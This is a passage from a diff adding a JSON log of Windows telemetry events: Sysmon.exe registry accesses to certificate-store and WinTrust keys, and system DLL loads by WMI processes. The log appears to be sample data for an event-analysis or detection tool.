"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfnet.dll", + "image_path": "C:\\Windows\\System32\\perfnet.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + 
"unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": 
"{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfos.dll", + "image_path": "C:\\Windows\\System32\\perfos.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemsvc.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 